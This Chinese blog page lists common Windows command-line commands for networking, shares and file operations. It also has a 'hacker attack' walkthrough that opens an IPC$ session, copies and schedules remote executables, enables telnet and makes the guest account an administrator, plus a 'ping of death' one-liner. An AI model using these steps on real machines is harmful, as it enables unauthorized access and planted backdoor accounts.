Windows 常见DOS命令
1. 查看网络连接及路由状况
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 查看某协议使用情况(查看tcp/ip协议使用情况) 例:netstat -p tcq/ip
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 查看对方最近登陆的用户名(对方136到139其中一个端口要打开)
finger username @host 查看最近有哪些用户登陆
ipconfig 查看本地ip地址,参数“/all”显示全部配置信息
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
tracert -参数 ip 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码
mem 查看cpu使用情况
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
2. 建立网络连接(磁盘映射)与资源共享
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net use i: "\\ip\sharefolder" "password" /user:"domain\username" 磁盘映射,将共享目录映射为本地磁盘i
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net user 用户名 密码 /add 建立用户
net user guest 12345 用guest用户登陆后用将密码改为12345
net user guest /active:yes 激活guest用户
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net password 密码 更改系统登陆密码
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
tftp -i 对方IP put c:\srv.exe 登陆后,上传本地c:\server.exe至主机
tftp -i 自己IP get srv.exe c:\srv.exe 登陆后,将"IP"的srv.exe下载到目标主机c:\srv.exe
参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。
参数: bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
3. 文件操作
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y表示确认
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
copy \\ip\admin$\srv.exe c:\ 复制对方admini$共享下的srv.exe文件至本地C:
cppy 1.jpg/b+2.txt/a 3.jpg 将2.txt的内容藏身到1.jpg中生成3.jpg新的文件
注:2.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
replace 源文件 要替换文件的目录 替换文件
move 要移动的盘符\路径\文件名 移动后的路径\文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
del /S /Q 目录 或 rmdir /s /Q 删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
del -F 文件名 加-F参数后就可删除只读文件
/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件
/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
md 目录名 创建目录
dir 查看文件
参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
ren 原文件名 新文件名 重命名文件名
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
find 文件名 查找某文件
fc 1.txt 2.txt>3.txt 对比二个文件并把不同之处输出到3.txt文件中,"> "和"> >" 是重定向命令
echo hello>d:\1.txt ; 写入文本到指定文件(如果文件存在则替换)
findstr "hello" 1.txt 在1.txt文件中寻找字符串hello
场景一、杀掉占用指定端口的进程
1)查看指定端口占用情况: netstat -ano|findstr "8080" TCP 127.0.0.1:8080 0.0.0.0:0 LISTENING 10844
2)查看PID对应进程: tasklist|findstr "10844" java.exe 10844 Console 1 486,664 K
3)结束该进程: taskkill /f /t /im java.exe
场景二、黑客攻击
Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源。
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,远程管理和查看计算机的共享资源。对方机器必须开了ipc$共享,否则你是连接不上的,连接成功后可通过139,445端口实现对共享文件/打印机的访问。由于Telnet服务默认是关闭的,可以在IPC连接成功后启动Telnet服务。
1)连接对方主机: net use \\127.0.0.1\ipc$ "" /user:"admintitrators"
2)在对方主机中运行程序
复制文件到对方主机: copy srv.exe \\127.0.0.1\admin$ (这里的admin$指C:\WINNT\System32)
查看时间: net time \\127.0.0.1 当前时间为:11:00
用at命令启动srv.exe: at \\127.0.0.1 11:05 srv.exe
3)使用telnet远程登录对方主机
复制ntlm.exe到对方主机: copy ntlm.exe \\127.0.0.1\admin$
进入admin目录执行ntlm程序: ntlm
打开对方telnet服务: net start telnet
使用telnet登录对方机器: telnet 127.0.0.1
4)修改guest 用户权限
激活guest 用户: net user guest /active:yes
修改guest 用户密码: net user guest 123456
将guest 用户加入Administrator组: net localgroup Administrators guest /add
5)退出连接: net use \\127.0.0.1\ipc$ /del
常见错误号:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码
参考原文: http://www.cnblogs.com/lhws/p/4024208.html
http://www.cnblogs.com/chinahbzm/articles/1423875.html
Windows 常见DOS命令的更多相关文章
- 第0章 概述及常见dos命令
计算机发展史 计算机的发展历史有多长?真正意义上的计算机诞生,距今也只有80多年的时间.80年,对于每一个人来说,是很长的时间,但对于整个历史来说,只是短短的一瞬间. 从第一代电子计算机的发明,到今天 ...
- Windows的DOS命令基础
Windows的DOS命令基础 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 1.dir: 查看当前路径下的目录(directory)详细信息 . 详细信息: a>.dir ...
- 使sublimetext3在ubuntu下可以打中文和在windows的dos命令行下正常显示中文
学习闲暇之余,总结一下在windows和ubuntu下使用sublimetext3遇到的问题 一.关于sublimetext3在windows的dos命令行下不能编译运行中文的解决方案: 因为dos命 ...
- 在Windows的Dos命令中切换盘符
在Windows的Dos命令中切换盘符... ---------------------------- --------------------------------------- -------- ...
- FW Windows下DOS命令大全(经典收藏)---mklink
dos command port-->PID: netstat -ano | findstr port | tasklist |findstr "" Windows SYST ...
- Windows 经典DOS命令大全
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或 ...
- Windows下DOS命令大全(经典收藏)
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或 ...
- 如何打开DOS控制台及常见DOS命令作用
如何打开DOS控制台? * A:xp下如何打开DOS控制台? * a:开始--程序--附件--命令提示符 * b:开始--运行--cmd--回车 * c:win+r--cmd- ...
- java 常见dos命令
盘符: 进入指定的盘符下. dir : 列出当前目录下的文件以及文件夹 md : 创建目录 rd : 删除目录 注意:rd不能删除非空的文件夹,而且只能用于删除文件夹. cd : 进入指定目录 ...
随机推荐
- js闭包(三)
场景一:采用函数引用方式的setTimeout调用 闭包的一个通常的用法是为一个在某一函数执行前先执行的函数提供参数.例如,在web环境中,一个函数作为setTimeout函数调用的第一个参数,是一种 ...
- MyBatis总结一:快速入门
简介 MyBatis 是一款优秀的持久层框架,它支持定制化 SQL.存储过程以及高级映射.MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集.MyBatis 可以使用简单的 ...
- Android屏幕适配终结者
1,http://blog.csdn.net/zhengjingle/article/details/51742839 github : https://github.com/zhengjingle/ ...
- 提示crontab command not found的解决方法
操作步骤 1. 确认crontab是否安装: 执行 crontab 命令如果报 command not found,就表明没有安装 2. 安装 crontab 执行 yum insta ...
- apaache php 日记设计
有个客户服务器是用apache搭建的,最近总是感觉站很慢,服务器很慢很卡,有时候甚至网 站都打不开,后来经过排查分析原来是里面的access.log和error.log这两个文件要经常上去看,和清理, ...
- 多线程 wait(),notify()方法,案例总结
废话不多说,案例如下 package com.xujingyang.Exok; /** * 商品类 * @author 徐景洋 */ public class Goods { private Stri ...
- Swing绘图API
----------------siwuxie095 工程名:TestSwingPaintAPI 包名:com.siwuxie095.swing ...
- SpringBoot07 异常枚举、自定义异常、统一的全局异常处理
1 异常编号和提示信息统一管理 利用枚举来实现异常的统一管理 package cn.xiangxu.springboottest.enums; import lombok.Getter; /** * ...
- SQl Server Tsql基本编程 ,循环语句 ,存储过程
一些比较重要但是不一定经常用的 句子 Tsql定义变量 declare @a int : 定义的变量前面必须用@,数据类型是SQL里的数据类型,执行的时候要把需要的有关联的代码一起执行,单独执行一条 ...
- win10 requireAdministrator设置开机自启动无效的解决方案
开发了一个wpf程序,需要管理员权限,设置了requireAdministrator 同时需要开机自启动,所以添加了注册表: using (RegistryKey key = Registry.Cur ...